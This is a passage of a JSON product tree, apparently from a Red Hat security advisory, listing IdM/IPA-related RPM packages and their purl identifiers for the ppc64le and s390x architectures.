"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client)",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client)",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client)",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client)",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1)",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1)",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1)",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le (idm:DL1)",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le (idm:DL1)",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1)",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1)",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1)",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1)",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client)",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client)",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client)",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client)",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client)",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x (idm:client)",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x (idm:DL1)",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x (idm:DL1)",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x (idm:DL1)",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x (idm:DL1)",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
